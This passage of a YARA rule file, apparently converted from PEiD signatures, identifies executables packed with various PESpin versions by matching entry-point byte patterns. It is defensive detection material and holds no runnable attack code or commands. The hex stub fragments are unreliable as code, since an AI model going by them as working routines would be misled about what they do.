E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_01_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_1304_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 AC DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v11_Cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_03_cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_11_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 C8 DC 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v07_Cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n        $b = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 88 39 40 00 8B 42 3C 03 C2 89 85 92 39 40 00 EB 01 DB 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D A6 39 40 00 53 8F 85 4A 38 40 00 BB ?? 00 00 00 B9 EC 0A 00 00 8D BD 36 3A 40 00 4F EB 01 AB 30 1C 39 FE CB E2 F9 EB 01 C8 68 CB 00 00 00 59 8D BD 56 44 40 00 E8 03 00 00 00 EB 04 FA EB FB 68 83 04 24 0C C3 8D C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 B3 5F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D 99 39 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PESpin_V041_cyberbobnbsp_nbsp_SignByfly_20080312: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 02 D2 46 00 0B E4 74 9E 75 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 8B ?? ?? ?? ?? ?? 8B 42 3C 03 C2 89 ?? ?? ?? ?? ?? 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 ?? ?? ?? ?? ?? 53 8F ?? ?? ?? ?? ?? BB ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 4F EB 01 AB 30 1C 39 FE CB E2 F9 EB 01 ?? 68 3C 01 00 00 59 8D ?? ?? ?? ?? ?? C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 ?? ?? ?? ?? 59 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 ?? E8 1A 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v07_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 88 39 40 00 8B 42 3C 03 C2 89 85 92 39 40 00 EB 01 DB 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D A6 39 40 00 53 8F 85 4A 38 40 00 BB ?? 00 00 00 B9 EC 0A 00 00 8D BD 36 3A 40 00 4F EB 01 AB 30 1C 39 FE CB E2 F9 EB 01 C8 68 CB 00 00 00 59 8D BD 56 44 40 00 E8 03 00 00 00 EB 04 FA EB FB 68 83 04 24 0C C3 8D C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 B3 5F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D 99 39 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V01_cyberbobnbsp_nbsp_SignByfly_20080312: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 8B ?? ?? ?? ?? ?? 8B 42 3C 03 C2 89 ?? ?? ?? ?? ?? 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 ?? ?? ?? ?? ?? 53 8F 85 ?? ?? ?? ?? BB ?? ?? ?? ?? B9 A5 08 00 00 8D ?? ?? ?? ?? ?? 4F 30 1C 39 FE CB E2 F9 68 2D 01 00 00 59 8D ?? ?? ?? ?? ?? C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 ?? ?? ?? ?? 4F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_13beta_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESPin_v13_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 AC DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n        $b = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 AC DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 0D 4F 40 00 8B 42 3C 03 C2 89 85 17 4F 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D 2B 4F 40 00 53 8F 85 21 4D 40 00 EB 07 FA EB 01 FF EB 04 E3 EB F8 69 8B 59 38 03 DA 8B 3B 89 BD D0 4F 40 00 8D 5B 04 8B 1B 89 9D D5 4F 40 00 E8 00 00 00 00 58 01 68 05 68 F7 65 0F E2 B8 77 CE 2F B1 35 73 CE 2F B1 03 E0 F7 D8 81 2C 04 13 37 CF E1 FF 64 24 FC }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PESpin_1304_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_0b_01_CyberBob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_13beta_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V071_cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v11_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n        $b = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 C3 4B 40 00 8B 42 3C 03 C2 89 85 CD 4B 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D E1 4B 40 00 53 8F 85 D7 49 40 00 BB ?? 00 00 00 B9 FE 11 00 00 8D BD 71 4C 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C C1 2C 24 06 F7 14 24 83 24 24 01 50 52 B8 83 B2 DC 12 05 44 4D 23 ED F7 64 24 08 8D 84 28 BD 2D 40 00 89 44 24 08 5A 58 8D 64 24 04 FF 64 24 FC FF EA EB 01 C8 E8 01 00 00 00 68 58 FE 48 1F 0F 84 94 02 00 00 75 01 9A 81 70 03 E8 98 68 EA 83 C0 21 8? }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PESpin_11_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v01_Cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n        $b = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 B3 28 40 00 8B 42 3C 03 C2 89 85 BD 28 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D D1 28 40 00 53 8F 85 C4 27 40 00 BB ?? 00 00 00 B9 A5 08 00 00 8D BD 75 29 40 00 4F 30 1C 39 FE CB E2 F9 68 2D 01 00 00 59 8D BD AA 30 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 07 4F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D C4 28 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 00 00 00 59 81 C1 1D 00 00 00 52 51 C1 E9 05 23 D1 FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PESpin_V03_cyberbob_20080312: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 CB 2C 40 00 8B 42 3C 03 C2 89 85 D5 2C 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D E9 2C 40 00 53 8F 85 B6 2B 40 00 BB ?? 00 00 00 B9 75 0A 00 00 8D BD 7E 2D 40 00 4F 30 1C 39 FE CB E2 F9 68 3C 01 00 00 59 8D BD B6 36 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 1F 53 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D DC 2C 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_07_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n        $b = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PESpin_v03_Cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 CB 2C 40 00 8B 42 3C 03 C2 89 85 D5 2C 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D E9 2C 40 00 53 8F 85 B6 2B 40 00 BB ?? 00 00 00 B9 75 0A 00 00 8D BD 7E 2D 40 00 4F 30 1C 39 FE CB E2 F9 68 3C 01 00 00 59 8D BD B6 36 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 1F 53 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D DC 2C 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v11_Cyberbob_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 C3 4B 40 00 8B 42 3C 03 C2 89 85 CD 4B 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D E1 4B 40 00 53 8F 85 D7 49 40 00 BB ?? 00 00 00 B9 FE 11 00 00 8D BD 71 4C 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C C1 2C 24 06 F7 14 24 83 24 24 01 50 52 B8 83 B2 DC 12 05 44 4D 23 ED F7 64 24 08 8D 84 28 BD 2D 40 00 89 44 24 08 5A 58 8D 64 24 04 FF 64 24 FC FF EA EB 01 C8 E8 01 00 00 00 68 58 FE 48 1F 0F 84 94 02 00 00 75 01 9A 81 70 03 E8 98 68 EA 83 C0 21 8? }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V1304_cyberbob_20080310: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 ?? EB 01 ?? EB 0D ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 ?? EB FB ?? ?? ?? ?? ?? ?? ?? 8B 42 3C 03 C2 ?? ?? ?? ?? ?? ?? EB 02 ?? ?? F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 ?? ?? ?? ?? EB 06 ?? ?? ?? ?? ?? ?? F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_10_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v11_by_cyberbob_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 C3 4B 40 00 8B 42 3C 03 C2 89 85 CD 4B 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D E1 4B 40 00 53 8F 85 D7 49 40 00 BB ?? 00 00 00 B9 FE 11 00 00 8D BD 71 4C 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v03_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 CB 2C 40 00 8B 42 3C 03 C2 89 85 D5 2C 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D E9 2C 40 00 53 8F 85 B6 2B 40 00 BB ?? 00 00 00 B9 75 0A 00 00 8D BD 7E 2D 40 00 4F 30 1C 39 FE CB E2 F9 68 3C 01 00 00 59 8D BD B6 36 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 1F 53 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D DC 2C 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V03_cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 CB 2C 40 00 8B 42 3C 03 C2 89 85 D5 2C 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D E9 2C 40 00 53 8F 85 B6 2B 40 00 BB ?? 00 00 00 B9 75 0A 00 00 8D BD 7E 2D 40 00 4F 30 1C 39 FE CB E2 F9 68 3C 01 00 00 59 8D BD B6 36 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 1F 53 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 